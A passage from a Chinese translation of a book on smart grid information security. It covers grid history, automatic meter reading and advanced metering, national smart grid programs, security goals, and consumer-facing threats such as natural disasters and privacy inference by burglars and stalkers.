坏。2012年5月爆发的“超级火焰”病毒危害性更大,更为智能,攻击了中东多个 国家。这些均为智能电网信息安全敲响了警钟。智能电网既要保证电网的安全、 可靠、稳定运行,又要防止各种对电网的不良企图得逞,面对现实或潜在的智能电 网安全威胁,各国政府纷纷成立专门研究机构,就相关问题和观点进行充分讨论,信息安全工作者肩负着重要的职责。 由于智能电网属新兴事物,智能电网信息安全也会出现新的威胁和情况,系统了解发达国家在该领域的工作对我国智能电网信息安全防护体系建设极有裨益。 本书的引进,可谓恰逢其时。本书主要对智能电网的优点和安全脆弱性相关内容 进行阐述。通过对智能电网环境下各个实体进行深入分析,对各实体在机密性、完 整性和可达性方面存在的安全问题以及如何保证上述安全特性进行了论述,对当 前美国智能电网安全标准规范进行了介绍,对公用事业公司如何构建成熟的安全 防护体系进行了论述,对于第三方合作、移动应用、社交网络、智能电表等内容的信 息安全管控进行了详细讨论。同时给出了智能电网消费者、设备供应商以及公用 事业公司如何进行控制从而最大化降低智能电网安全风险的方法,阐述了在智能 电网安全方面美国联邦政府、地方政府、国营及私营电力公司的重要作用。通过本 书,用户能够更为深刻的理解在智能电网部署时存在的安全威胁、安全攻击,从而为有效避免这些问题的发生做好防范措施。 该书作者长期从事智能电网和信息安全研究工作,书中内容立足于美国智能 电网实际,对我国智能电网建设也将起到很好的借鉴作用,与其他从传统信息安全 技术角度对智能电网安全进行阐述的书籍相比,本书针对性更强,对于从事智能电网信息安全研究和建设工作具有更强的指导作用。虽然在智能电网建设中要解决和克服的问题很多,但我们有充分的理由相信, 我们在建设过程中一定能够解决各环节存在的问题, 一个安全、可靠、灵活的智能 电网将会给人类带来更新的体验、更便捷的生活,为人类信息时代带来更美好的未来。 译者序 第二次工业革命以来,电力得到了广泛应用,电力的发、输、配、用技术在电力、 电气工作者的持续努力下走向成熟,电力网络也逐步发展成为人类社会生产、生活 的核心基础设施。然而,现代电网正面临着能源浪费、可靠性低、可再生能源支持 少等一系列重大挑战,亟待构建更为智能化的电力网络以应对上述挑战。谈到智 能化,很自然就与信息通信技术紧密关联起来。在智能电网的背景下,信息通信技 术被系统化地应用于电力的发、输、配、用各个环节。这里电网与信息通信并非简单的叠加,而是深度的有机融合,以构建更为可靠、经济、环保的未来电力网络。信息通信技术与电网的深度融合也意味着智能电网成为网络空间的重要组成 部分。作为陆、海、空、天之外的第五维空间,网络空间得到了各发达国家的高度重 视。目前,活跃于网络空间的攻击者已经不仅仅是单打独斗的黑客,有组织的专业 级组织,乃至国家力量都已浮出水面。近年来的“震网”、“火焰”病毒的案例昭示着 这些网络空间的新兴攻击力量逐渐成为主流。因此,来自网络空间中的安全问题已成为智能电网面临的重大现实挑战。电力企业的信息安全防御思想目前还停留在边界防护的阶段,并假定隔离的 生产网络自身是安全的。“震网”病毒对伊朗核电站造成的巨大破坏可视作对上述 假定的颠覆。因此,电力信息安全的管理和实践必须采用全新的指导思想,以构筑 全新的智能电网信息安全体系,相关工作需要大批兼具电力和信息安全专业知识 的人才。而遍观市场现有书籍,能够综合阐述智能电网和安全技术,以支撑智能电网安全专业技术人才培养的书籍可谓少之又少。 智能电网概述 在过去几年中,智能电网的前景和优势被广泛宣传。由于智能电网将最新的 科技应用到发电、输电和用电中,它被吹捧为是一项能够在经济、环境和国家安全 方面带来革命的技术。大大小小的公司预见到智能电网技术的潜在市场,纷纷投 入到这项产业中来。本书将简要介绍在智能电网技术的设计和实现过程中,忽略 安全性造成的潜在后果。我们还会对如何发现并改进这些不良后果,从而实现更 安全的智能电网提供建议。 1.1 电网简史 与电网有关的科技可以追溯到19世纪晚期。托马斯·爱迪生(图1.1)的直流 电和尼古拉·特斯拉(图1.2)的交流电一直沿用至今。今天,我们通过交流来传 输电力,而直流电则被用于某些特殊的应用,通常在居所内或商业建筑内。 1.1.1 什么是电网 电网有三种主要功能:发电、输电和配电。发电是送电的第一步, 一般在发电 站(热电站、核电站、地热电站、水电站等)实现。输电是送电的第二步,它包含了从 发电站到电力公司配电系统的转移过程。最后,配电通过将电力送达消费者完成 了电网的全部功能。输电和配电的主要不同在于,输电使用的是能承担高压(110 千伏以上)的电力基础设施,而配电使用的是中等电压(小于50kV) 和低压(小于1kV) 的电力基础设施。 1.1.2 电网的拓扑结构 在最简化的情况下, 一个电网可以看作一个网络。电网这个词可以指一个包 含发电、输电、配电的完整基础设施,也可以指一个更大基础设施的某个子集。配电网络并没有输电网络那样复杂,因为很多情况下,输电网络需要与其他区 域的输电网络互联来提供更大的冗余性。粗略地看,这种互联似乎在供给配电网 络电力上提供了更大的可靠性,但是实际上,在保证终端消费者的电力供应上,起 作用的因素有许多,输电网络必须能够有效地处理发电、消费和电力中断以及中断一个地区的电 力供应可能影响到另一个区域的问题。美国建立了北美电力可靠性公司(North American Electric Reliability Corporation,NERC)来保障大规模电力系统的可靠 性。这个非营利性组织的责任区域包括美国、加拿大的全部以及墨西哥Baja pen- insula 的部分地区。在美国的配电系统中,使用的基本拓扑结构有两种。最常见的拓扑结构是辐 射型电网,如图1.3所示。在辐射型电网中,子站电力的配电模式类似于一棵有许 多枝叶的树。当电流在电线中传输时,电流将一直衰减,直到它到达最终目的地。 另一种应用在配电中的基本拓扑结构是网状电网(Mesh Grid),如图1.4所示。与 辐射型电网相比,网状电网提供了更好的可靠性,这是由于在辐射型电网中,所有 的分支和叶的电力来自于同一个节点(树),而在网状电网中,电力可能来自于其他 的分支和叶。辐射型电网通过将第二个子站接入网络来提供有限的冗余,但是这 是建立在第二个子站不会受到和第一个子站相同的环境的影响基础上的。 环状拓扑,最初在欧洲被使用,是一种对于辐射型电网和网状电网的结合。环 状拓扑,看起来更像是辐射型电网,但是它的每一个分支和叶都有 两条不同的来自子站的通路。辐射型电网易受单个节点故障影响,而环状拓扑在这方面提供了更好的可靠性。环状拓扑的目标是能够抵挡网络中的一次中断,不 论这次中断发生在哪。与网状拓扑类似,环状拓扑要比辐射型电网成本更高,因为 环的每一个端都需要满足对电力和电压衰减的要求。 1.1.3 电 网 的 现 代 化 就当前而言,美国的电力基础设施并不能胜任承担美国未来电力供应的职责。如 白宫能源与气候变化办公室主管 Carol Browner 所言,“我们(美国)国家现在的电力系 统非常陈旧……现在的系统是过时的,它应该被废弃。”1在电网需要提供的所有三个 功能中,都可以做出显著的改进来提升系统在发电、输电和配电方面的可靠性和效率。电力系统的解除管制通常被吹嘘为实现当今电网现代化的方法。电力系统的 解除管制指的是,将现有的授予较大公司控制某一区域发电、传输和配电的垄断权 的制度改变为一种在地域内由自由市场决定电力网三个功能的制度。在一个电力 系统的解除管制的制度下,发电、传输和配电可能有不同的公司掌控,以此来提供 更高效、可靠和经济的解决方案。除此之外,还有许多的方案来实现当今电网的现代化。其中最突出方案就是智 能电网。最近奥巴马政府宣布支持的行动方案中,包括34亿美元向类似智能电表实 现、网络基础设施提升和制造智能设备2]项目的拨款,这些拨款将马上会兑现。 1.2 什么是自动抄表系统 自动抄表系统最早是由尼古拉·特斯拉的设计演化而来。1977年,自动化技 术被引入自动抄表系统基础设施。通过整合多种技术,包括有线和无线网络,自 动抄表系统最大的成果在于它使得电力公司能够远程抄表 。 自动抄表系统被实现 后,电力公司就能够不费力气的获取电表上几乎是实时的读数,并能向消费者提供 基于电力消耗的账单。在此之前,电力公司只能依靠估计来向消费者提供账单。在获得了更完善、更及时的信息后,电力公司还能够更好地控制自己的发电量,以 使其无论是在用电高峰还是低谷都更接近实际的用电量。 1.2.1 自动抄表系统 为了支持自动抄表系统基础设施的进步,有多种新技术在实际中被应用。对 于数据采集,公用事业公司员工通过手持设备和笔记本电脑提高效率。对于数据 传输,有线和无线的网络被部署来实现远程抄表。 1)手持设备 为了给公用事业公司员工快速有效地抄表提供支持,类似于PDA 的手持设备 (如图1.6)被应用于智能抄表。这些设备有两种方法进行抄表。第一种方法,电力工人可以通过触碰技术,即通过探头来触碰仪表,来实现抄表。这个探头会存储 仪表的数据,用于以后的检索和处理。第二种方法,手持设备上可以插入一个无线 接收器,手持设备通过这个无线接收器来获取仪表传输的读数,之后再存储数据, 用于以后的检索和处理。 2)便携式计算机 公用事业公司员工也将传统的便携式计算机用于读表。移动计算机能像手持 设备一样安装在电力工人的运载工具中来实现无线地读表,而不需要直接物理访 问每个仪表。通常,这些设备的部署需要结合多种科技,包括无线技术、软件和必 要的硬件(GPS、天线等)。 3)无线网络 电力公司使用了大量的无线网络技术来实现读表数据的传输。现在已使用的 技术包括无线射频、Wi-Fi、蓝牙,甚至是蜂窝移动通信技术。大量的自动抄表系统设备使用了无线射频技术,通常利用的有窄带、DSSS(直接序列展频)和 FHSS(跳 频展频)技术。相对不太常见的无线技术包括 Zigbee 和 Wavenis 也在自动抄表技 术的部署中得到了利用。在使用无线通信技术后,设备制造商或者从类似于美国 联邦通信委员会(FCC) 的政府部门获取频率使用许可,或者使用未授权的频率。 当 Wi-Fi 被选中作为远程数据传输技术时,传统上讲,仪表设备本身并不具备 Wi-Fi 功能,仪表通过无线射频向一个管理站传输数据,管理站利用Wi-Fi 来向电 力公司传输整合后的数据。得克萨斯州的 Corpus Christi 使用的就是这种部署模 型。在这种部署模型中,电力表多数情况下依靠电池供电,因此由于Wi-Fi 相对于 无线射频的高耗电,使用Wi-Fi 是不切实际的。Wi-Fi 高耗电的特点至今仍然是将 它应用到自动抄表系统中的主要障碍。 4)电力线载波通信(Power Line Communication,PLC) 电力线载波通信为读表数据提供了一套完整的远程解决方案。来自仪表的数 据通过现存的电力线路基础设施传输到本地的子站。数据再从本地子站传输到电 力公司进行处理和分析。这种基于从仪表到电力公司的基础设施的解决方案通常 被称为“固定”网络。 5)混合模型 尽管一些自动抄表系统的部署过程可能依赖于一种单独技术来实现部署的各 个部分,还有一些自动抄表系统采用一种融合了多种技术的混合模型。例如,数据 传输可能主要基于电力线载波通信,但是在电力线载波通信不可用的时候,无线射 频可能会替代电力线载波通信进行数据传输。其他的混合模型可能依赖无线射频 来传输数据到集合点,然后利用电力线载波通信或者 Wi-Fi 将数据传输到电力 公司。 1.2.2 自动抄表系统网络拓扑 利用一种或者多种前面提到的科技,电力公司创建了一种能够获取仪表信息 的网络。这些网络采用以下几种拓扑之一,包括: (1)星形网络:星形网络在仪表需要将数据传输到一个中心地点时被使用。这 个中心地点可以是一个中继器,它将数据继续送往电力公司,或者它可以仅仅用作数 据存储。 一个星形网络拓扑可以使用无线技术、电力线载波通信或者两者结合。 (2)网状网络:网状网络在仪表自身既要传输数据,又要接受数据时被使用。 仪表与星形网络中的中继器类似,并且最终数据会被送达电力公司或者数据存储 设备。这些意味着什么? 在了解了组成自动抄表系统基础设施的各个部分后,很容易理解为什么在设 计阶段就要考虑安全问题。自动抄表系统基础设施中使用了大量的技术,这些技术会对数据传输的机密性、可用性和完整性造成影响,因此提升每一个独立科技的 安全形式是非常必要的,同时也要注意它与其他技术的相互影响。 1.3 未来的基础设施 正如在本章“电网简史”部分描述的,当今的电力基础设施是在19世纪和20 世纪被设计的,它们利用当时的科技并处理当时的需求。当今对于这个逐渐老化 的基础设施的需求在不断增长,这只能通过细粒度的控制和对于消费需求的洞察 来实现,这些都是智能电网有望实现的。 1.3.1 使用智能电网的理由 理想的智能电网设法去重新调整这些问题以及其他一些问题。使用智能电网 的理由大体上分为三类:经济上的、环境上的和可靠性上的。美国能源部(DOE) 将 智能电网的目标定义如下: 将可靠性提高到前所未有的高度 保持服务的性价比 加强自身的全球竞争力 完全适应可再生和传统的能源 潜在的减少碳排放 提供未来性能和效率的提升能力 1)能源浪费 电力必须在产生的时候立即被使用,而消费者已经习惯于在需要时就能使用 电力。当今,这种结合要求电力公司在任何时候能够产生足够的电力来满足电力 需求。由于很难获知准确的需求数据,电力公司需要产生多余需求的电力来防止 意外的用电高峰并保证服务质量。在这套供求系统中,当需求被高估时,造成电力 的浪费,而在需求被低估时,会造成断电。 2)可靠性 除了浪费之外,电网的可靠性可能会受到许多因素的影响。具体来讲,电力供 应的电压下降可能会引起电压起伏及闪烁,而环境因素,从树木倒下到雷暴和飓风 会造成断电。尽管这些可靠性问题多数发生在局部范围,他们还是可能会引发更 大的问题,影响到更广泛的区域。表1.1描述了电力中断的不同类别。 3)可再生能源 传统的发电方式依靠无尽的、对环境没有负面影响的能源。在这样的情况下,中 心化的、依靠无穷无尽的传统能源的发电方式表现的很有优势。然而,有限的资源和 对环境影响的关注正在驱使发电使用更加清洁和可再生的能源,比如风能和太阳能。 不幸的是,这些清洁、可再生的能源在本地化和持续性方面有自己的问题。例如,太 阳能电厂如果被建立在佛罗里达州,它就能够产生大量的电力;然而,如果它被建立 在南极洲,那它产生的电力就变得微不足道了。除此之外,当前的太阳能电厂在夜间 和碰到诸如雷暴和飓风这类天气的时候,都会停止发电,这时就需要使用替代能源来 发电以满足需求。综上所述,当前的电网不能很好地适应可再生能源。 1.4 什么是智能电网? 智能电网并不是一个单独的设备、应用、系统或网络,甚至不是一个单独的理 念。对于什么是智能电网这个问题,并没有一个统一的官方定义。然而,各种各样 的组织,如美国能源部,北美电力可靠性公司,和智能电网技术平台,给出的各自定 义中,都遵循了一个主题:智能电网利用通信技术和信息技术来优化从供应者到消 费者的电力传输和配电。除此之外,智能电网不是一个静态的概念。它会随着当今科技的泛着和新科技的产生而不断发展。 这些技术的类型、配置和实现,以及对相关信息的获取、传播和使用是实现智能电 网安全和本书的主要关注方向。 1.4.1 组件 为了达到预期的可靠、有效和使用清洁能源的配电,智能电网利用了多种科 技。根据美国能源部的描述,以下技术被认为是关键技术领域[3]; ● 集成双向通信技术 ● 先进设备技术 ● 先进控制技术 ● 参数测量技术 ● 决策支持技术 ● 智能电网技术应用 1)集成双向通信技术 双向通信使得操作者能实时地监控和操作电网的组件。这种通信提升了操作 者操纵电网的能力。例如,在现在的电网中,操作者不能发现电网断电,除非收到 了消费者的提示,通常是通过电话联系到消费者支持中心。在智能电网中,操作者 能够在没有任何消费者提示的情况下检测并处理问题,这样就能更快地解决问题 并降低操作成本。为了达到这种效果,智能电网的组件需要具有双向通信能力。 不同的智能电网实现会利用不同的技术,但是它们都需要底层的数据传输网络。 当前的智能电网利用的网络技术也被用于自动抄表系统部署中,如本章前面在“自 动抄表系统网络拓扑结构”部分所述。 2)先进设备技术 先进设备技术包括的范围有超导设备、容错设备、超额电力存储设备、智能设 备和诊断设备。这些技术积极的决定了电网的电学性质。例如,太阳能电厂白 天产生的超额电力可以被存储在电力存储设备中,等到了夜晚,太阳能电厂不再能 发电时,再被取出使用。所谓的智能设备能够向消费者和电力供应者提供有用的 消费回馈来实现更好的能源管理。尽管以上提到的列表看起来好像列出了一组分 散的多种类的科技设备,这个关键技术领域列表中的智能电网组件能提供相对于 当前使用的电网的独一无二的优势。 3)先进控制技术 利用在本章“集成双向通信”部分提到的双向通信组件,先进控制技术允许操 作者(人或机器)来操控各种各样的智能电网组件。具体来讲,先进控制技术使得 高级数据收集、诊断和维护成为了可能。例如,操作者可以远程的识别问题并安装 补丁,这样一来就节省派遣技术人员到现场花费的时间和其他成本。 4)参数测量技术 新的参数测量技术为智能电网的稳定性、健康度和安全功能提供支持。这些 科技中最常见的是智能仪表。图1.8中展示了一个智能仪表。 一个智能仪表监控 使用数据并向电力公司、消费者和第三方服务提供商提供使用细节。依靠智能仪 表和基础设施,智能仪表可以被用来实现其他的管理功能,如电力中断提醒和远程 停止服务。 5)决策支持技术 人类和机器使用不同的语言,因此,重要的信息可能在转换中丢失。对于智能 电网,由于其自身特点,它可以在一个很短的时间帧内收集对于个人来说非常复杂 和非常庞大的信息。人机界面需要必须使用一种高效的手段来简化数据和结果的 分析,从而使得操作者和管理者能够快速地做出决策。人机界面可以被描述为用 户与机器交互的方式。根据国际电工技术委员会(IEC) 的描述, 一个系统的成功 与否通常依赖于它的人机界面能否有效获得用户的认可。 6)智能电网技术应用 掌握消息的消费者是明智的。这是促使智能电网向消费者提供实时使用数据 的背后原因。应用程序会向消费者提供实时的使用数据和价格以及削减消费者电 力账单的建议,比如在夜晚非用电高峰期运行洗碗机,而不是在下午居民都下班和 放学时候运行。应用程序尽量用普适的方法提供这些信息,以确保消费者总是准 确地知道他们在使用多少电力和电力的价格。提示安全问题不应为了实现功能而被牺牲。电力公司和第三方应用服务提供商应该确 保信息的机密性。 1.5 什么是高级量测体系? 高级量测体系为电力公司从智能电表中远程的测量、收集和分析使用数据提 供了可能。高级量测体系与自动抄表系统类似;但是高级量测体系对于自动抄表系统而言有一项显著的提升:与仪表的双向通信。智能仪表收集的信息驱动智能 电网以需求-响应的模式运行,同时还构成了绝大多数智能电网应用的基础。高级 量测体系底层的网络连接了仪表和商业系统,并最终向消费者、电力公司和服务提 供商提供这些信息。 警告 向商业伙伴提供这些信息的简单方法是向他们提供你内部网络数据库的授权;然 而,这个方法可能会使你的环境处在一个非常危险的境地。应该使用最低特权级, 包括对你“信任”的商业伙伴。 1.6 国际组织 尽管智能电网部署的核心区域在美国,全球其他国家也在向实现智能电网迈 进。从全球范围看,澳大利亚、加拿大和中国已经进行智能电网的部署、计划和组 织。同美国一道,欧洲也在智能电网技术中处于领先地位,建立了一些大范围的部 署和组织。 1.6.1 澳大利亚 在2009年,澳大利亚政府承诺通过国家能源效率计划(the Nation Energy Efficiency Initiative)为智能电网技术储备1亿美元。澳大利亚智能电网的目标是 产生一个更高效、强鲁棒性和消费者友好的电力网络。在这个被称为“智能电 网,智能城市”的计划中,澳大利亚致力于利用高级通信系统[6]、传感器和仪表, 并基于现存传输和配电网络的智能电网,最终实现自动控制、监视和调节电力的 双向流动,“智能电网,智能城市”计划会选择一个提议并在一个由独立电力公司供电的 单独社区实现它。澳大利亚希望智能电网的优势不仅使得示范社区的传输和配电 网络变得现代化,还能实现示范社区消费者的应用和设备现代化。这个计划现在 处在提议评估和为2010年后半段宣布结果做准备的阶段。 1.6.2 加 拿 大 在2006年,作为节能责任法案(Energy Conservation Responsibility Act)的一 部分,安大略政府授权要求在2010年前向所有消费者提供智能电表。安大略政府 拥有的电力公司 Hydro One 正在向安大略省内的130万消费者部署智能电表。 这项部署采用由 Trilliant 公司生产的智能电表。Trilliant 公司位于加利福尼亚州 的雷德伍德市,在2007年的公用事业规划网络(Utility Planinng Network)中,它 被提名为“北美最佳自动抄表系统计划”。 1.6.3 中 国 在2009年5月21日,中国公布了“坚强智能电网”计划。计划被分为三个独立 的步骤:计划和测试、建造和开发、升级。从2009年到2010年,坚强智能电网的计划 和测试步骤将会集中进行开发计划,技术,标准和性能试验。建造和开发部分将在 2011年到2015年进行,这个部分包括了基础设施的建造,操作框架的开发,设备制造 以及部署。最后一步,升级,将在2016到2020年进行,并完成整个计划。 1.6.4 欧 洲 在2005年,欧盟为未来的电网创建了欧洲技术平台。这个又被称为智能电网 平台的欧盟委员会由欧盟委员会研究部门直接领导创建,并且承担了改进欧盟电 力网络的使命。 智能电网平台就欧洲未来的智能电网问题达成了共同愿景[8]: 灵活:满足消费者的需求并能适应变化的环境。 易接入:对所有用户提供通用的接入方法来确保他们能够利用可再生能源 发电技术。 可靠性:确保安全性和持续性,在满足未来需求的同时,抵抗灾难和不确 定性。 经济:通过创新和效率提供价值,通过竞争和规范实现高效的能源管理。 智能电网平台计划在2020年实现这一愿景。如需进一步了解,建议阅读2006 年出版的《欧盟智能电网技术平台:未来欧洲电力网络愿景和策略》。 1.7 我们为什么要保障智能电网安全? 现今,智能电网看起来像是解决世界能源问题的灵丹妙药。它们承诺提供更高 的效率、可靠性以及更节约的配电和输电方法。这些提升依赖于新技术和电力网络 中心建立的互联机制,同时也依赖于不同组织的合作和大量数据的分析。然而,随着 新技术的应用和更容易获取的能源数据及设备的使用,新的攻击漏洞可能被利用。 1.7.1 电网与安全 当大多数人听到诸如“新技术”、“互通性”、“数据分享”和“商业伙伴”之类的术 语时,第一个想到的是新的功能和好处。另一方面,安全专家们立即考虑到这些新 功能和新优点被引入实际环境后,带来的新的安全风险。安全专家通常依赖于给 予最低的数据和资源访问特权原则来限制访问。因此,安全部门有时会与业务部门发生冲突,安全控制有时候与新功能相冲突;然而,恰当地实现安全控制不应该 妨碍适当的功能。安全控制的目标是使得新功能正确的工作并且保护它不被滥用或误用。理想情况下,安全专家会和业务部门合作来确保新功能以一种安全的方式工作的同时,保持原本功能的意图。 注意 最小特权原则要求用户被给予能够使其顺利完成工作的最低的特权。通过仅授 予有需要用户访问权限,引入的风险被降低到可接受和可控的范围内。完全安全的应用、网络或者环境并不存在,这在智能电网中也不例外。营销 策划中宣称的“防黑客”仅仅是为了营销策划本身,在现实中从来都不存在。尽 管每一个被认同的智能电网组件都引入了对于功能性和操作性的提升,但他们 同时也向电网引入了新的漏洞和额外的风险。如果不能很好地被控制,攻击者 会出于包括好奇、利益、名气、激进主义和战争等多种目的利用这些漏洞进行攻击。 1.7.2 智能电网安全目标 智能电网最常被提及的目标之一是提升电网的安全性。这可能会使得安全性 看起来像是一个额外的特点,然而,安全性不需要独立的被集成到智能电网中来使 其生效。机密性、完整性和可用性是信息安全的核心原则,他们必须被应用到智能 电网中来保证其各个目标的顺利实现。 1)可靠性 正如在本章“使用智能电网的理由”部分描述的,智能电网相对于传统电网的 一个计划中的提升就是可靠性。可靠性涉及到信息安全原则中的可用性和完整 性。安全性需要负责抵御各种各样的拒绝服务攻击(DoS), 包括人为引起的和有 关环境的攻击。通过恰当的安全控制,智能电网能够阻止或者最小化拒绝服务攻 击的影响,进而提升电网的可用性。数据分析在智能电网中扮演主要角色,而数据的准确性,或者称为完整性是至 关重要的。需要采取恰当的安全控制来确保收集到的数据不被干扰。例如,智能 仪表会发送消费数据到电力公司来产生账单和实现操控。在这个例子中,可以采 用类似散列表的安全机制来保证电力公司能够验证消费数据并确保用户收到准确 的账单。 2)可支付性 如果智能电网想获得成功,那么它带来的好处不应该显著提升电力公司或 是最终消费者的成本。智能电网的实现和操作成本不应该影响到它的可支付 性。尽管准确的数据不得而知,最近的评估结果显示电力窃取大概造成每年60 亿左右的损失[1]。仪表干扰是当前电网中使用范围最大的电力窃取手段,而类 似地,智能电网中使用的智能电表也被认为是易受攻击的目标。这就需要采取 适当的安全控制来保护智能电表数据的完整性,同时也要保证智能电网中每个 组件的完整性。尽管完全消除欺诈和电力窃取是不切实际的,但降低这类事件的数量还是会显著地提升电力公司的收入。作为结果,电力公司会降低电力的 价格。 3)适应可再生能源 可再生能源被认为会在未来的电网中扮演重要角色。电力窃取是电力公司已 经面对了数十年的问题,而与此相关的一个新问题是消费者欺诈性地向电网售卖 电力。如果 一 个顾客在他的屋顶安装太阳能电池板,他就会有能力将额外的电力 售卖给电网;然而,电力公司需要确保他们没有为谎称的电力买单。与可支付性的 目标类似,智能电网组件的完整性在实现有效地适应可再生能源中是至关重要的。 4)降低碳排放量 降低碳排放量的 一 个建议是降低我们对能源的消耗。利用智能电网组件收集 到的数据,电力公司和第三方能够向消费者提供实时的使用数据,以此来帮助消费 者调整他们的习惯来减少他们对能源的使用。鉴于个人隐私考虑,这类信息的机 密性必须通过恰当的安全控制实现,比如加密。 1.8 总结 几个世纪以来,托马斯·爱迪生、尼古拉·特斯拉和乔治·威斯汀豪斯之间的 古老争论仍在继续。直流电和交流电在今天都还在被使用,而现在中心化的发电 模式、乔治·威斯汀豪斯的设想,正在受到质疑。智能电网会支持更多的分布式的 选择利用当地可再生能源的发电。在20世纪90年代前,大多数软件应用是为内部使用设计的,而没有为来自互 联网的不受限制的访问做好准备。类似地,电网在设计时也没有考虑现代互联的 网络,因此会遭遇巨大的新问题。安全性即可以被视为智能电网发展的绊脚石,也 可以被看做是实现国家智能电网目标雄心的促成者。 面向消费者的安全威胁与影响 无论是直接的还是间接的,消费者都会被智能电网的威胁所影响。消费者可 能会成为电力公司的威胁来源,也可能是威胁的受害者。在第1章“什么是智能电 网?”中讨论过的智能电网的目标之一,就是向消费者提供更多关于他们电能消费 习惯和价格的信息。为了保护消费者不受本章讨论的威胁影响,消费者也需要被 告知这些威胁、潜在的攻击路线以及为了防止这些情况需要做的防护。教育消费 者的责任非常可能成为一个被热烈讨论的问题,但是这需要政府、企业和消费者权 益保护组织的共同努力。当讨论对于信息系统的威胁时,相对容易的解决方案是完全把责任归于黑客。 但是黑客仅仅代表了信息系统,或者说最终的智能电网、已经面临过的和未来即将面 临的威胁中很小的一部分。本章将从消费者角度描述智能电网可能会遭遇的威胁。 2.1 消费者威胁 消费者面临现代科技的安全威胁并不少见。尽管并不完全相同,消费者已经 在使用个人计算机、移动电话和现在的电网时面临过类似的威胁。随着对科技依 赖的增加,对作为科技驱动力的电力的依赖也在同步增加。当你从消费者手里拿 走一种单独的科技产品,比如笔记本电脑或者移动电话时,消费者会愤怒,但是也 能不太费力的适应。消费者能够比较容易地找到移动电话的替代品,但是当他们 被剥夺了电力的使用权时,消费者会发现他们失去了对所有一直以来依赖的科技产品的使用能力。由此而知,智能电网的威胁会以多种方式影响消费者的生活,从个人隐私到应急生命保障系统。 2.2 自然发生的威胁 据北美电力可靠性公司(NERC) 扰动分析工作组(Disturbance Analysis Working Group)称,美国和加拿大的电力公司在2009年前三季度共报告了104起 主干电力系统的扰动事件。自然威胁,比如极端天气和自然灾害, 是接近50%的扰动事件的产生原因。 从小的风暴到自然灾害,智能电网面临大量给消费者造成极大影响的自然威 胁。尽管可以通过在大部分电网区域构造冗余减小威胁,对于消费者来说还是会 出现单点失效问题。在目前的观点看来,智能电网将会有能力按照不同路线发送 来自不同源头的电力。输电线路还需要向消费者的家或者办公楼输送电力,但是 如果一个单独的通往消费者房间的输电线路被切断了,电网中其他的输电路线不 会影响到消费者。例如,如果大风吹倒了消费者院子中的一棵树,并压在了输电线 路上,消费者会失去电力供应。 2.2.1 天气和其他自然灾害 在之前关于被吹倒的树木的例子中,电力公司应该能够在一定的时间内维修 输电线路,并恢复对消费者的供电,因为这个威胁仅仅涉及到一个消费者。然而, 通常的情况并不是这样。在2005年,卡特里娜飓风导致了持续几周、涉及170万 人的电力中断2]。此外,前一年在大西洋形成的热带气旋数量有所上升。“自从1995年,平均被命名的风暴数量为15个,而在之前的多维十年信号 (the multi-decadal signal)处在未被激活状态的25年中这一数据是8.6。在1995年以后平均有7.7次飓风和3.6次强烈飓风出现,而在1970年至1994年这一数 据是5次飓风和1.5次强烈飓风。”虽然每年显著风暴的数量还在浮动,但是在可 以预见的未来、产生强烈风力和其他破坏效应的风暴仍将是电网的威胁之一。 飓风会影响到生活和工作在海岸沿线的消费者,但是,不同地理环境的区域也 都受到不同种类的自然灾害和极端天气的威胁。例如,爱荷华州的消费者可能不会受到飓风的影响,但是,他们会被龙卷风、暴风雪和洪水影响。类似地,南加州的 消费者不会被暴风雪影响,但是地震和野火会极大地影响电力的配电。 注意 在短期内,完全的消除来自极端天气和自然灾害的破坏是不可能的。既然我们不 能阻止极端天气发生,在应对破坏性自然现象时候,应急响应计划就显得至关重要。 2.3 个人和组织的威胁 操作者通过高级量测体系和智能电网的其他组件远程地管理消费者家中的设 备。此外,消费者家庭自动化网络(Home Area Networks,HAN)中的智能设备使 得消费者和某些电力公司远程控制电力的使用成为了可能。例如, 一些电力公司 会向消费者提供一些信用额度来换取在用电高峰期关闭消费者空调和加热器的控 制能力。然而,大量的动机会驱使个人和组织滥用这类和其他智能电网的功能。 从愤怒的邻居到恐怖组织,获取高级量测体系、家庭自动化网络设备和他们功能的 可能性会导致针对智能电网和最终使用智能电网的消费者的攻击。 2.3.1 智能窃贼和跟踪者 智能电网的愿景之一是期望能向消费者提供基于他们能源消费的信息。消费 者将能够在接近实时的情况下,比如每小时,监控他们的能源消费,而现在消费者 只能够每月获得一次消费信息。智能电网期待的目标之一是能够使得消费者能够 为了削减他们的电力账单而改变消费习惯。然而,其他一些人能够利用这种访问 监测信息的能力来完成恶意的行为。这种级别的信息会极大地帮助窃贼完成对消费者的盗窃。例如,爱丽丝的电 力公司利用一个社交网络页面,比如Twitter, 向消费者提供实时的能源使用数据。 窃贼鲍勃将爱丽丝定为他的下一个目标,并且开始通过爱丽丝的电力公司 Twitter 来监视她的电能使用情况。通过第一个月的了解,鲍勃注意到爱丽丝的用电情况 是100瓦/小时,或者说是2.4千瓦/天。他还注意到爱丽丝在早晨7点到8点之 间她的用电量显著增加,并且在下午四点后显著下降。鲍勃经过推理确定爱丽丝 在7点和8点之间的某时起床去上班,并且直到下午4点和5点之间才回家。更 进一步讲,鲍勃注意到爱丽丝在过去三天的每小时平均电能使用显著减少,并且没 有之前日常使用中的用电高峰。鲍勃推理得知爱丽丝在过去三天不在家里,很可 能是在外出旅行。于是,鲍勃现在发现了一个从窗户入户对爱丽丝家进行盗窃的 机会。将这个观点进一步延伸,窃贼可以利用对消费者数据的访问权来确定最佳 目标,决定每日和每周的活动并得知用户在什么时段使用洗衣机、干燥机、洗碗机 和其他高噪音设备来掩盖自己的恶意活动。 跟踪者也能从对目标的智能电网信息访问中极大地获益。假设爱丽丝通常在 周六晚上在家里办晚宴派对来招待亲朋好友,这需要在晚上6点到10点提升电力 的使用量。最近,爱丽丝家的Twitter 显示她的用电高峰只从晚上6点到7点30, 然后就下降到平时的用电水准,并在11点到午夜又开始上升。更让人感兴趣的是 在每个没有晚宴派对的周六后的周日,爱丽丝会黎明前给电动车充电。使用类似 的推理,跟踪者史蒂夫能够推知爱丽丝开始了一段恋情并且开车到许多不同的地 方去。如果史蒂夫能够获得更详尽的电力使用信息,他或许能够通过比较电动车 充电的电量(晚宴派对相对于其他)准确地计算爱丽丝开车的距离。跟踪者史蒂夫 根据这些就能得知爱丽丝最爱的餐馆、约会习惯并最终描绘出她的生活习惯。 2.3.2 黑 客 入侵智能电网的动机很多。以下列出了最常见的黑客动机: 智力挑战 自我表现和同伴认同 测试计算机系统安全 恶作剧或好奇心 权利 复仇和报复 攻击系统或恐怖主义 这些动机仍然会和智能电网有关并且会以新的方式影响消费者。 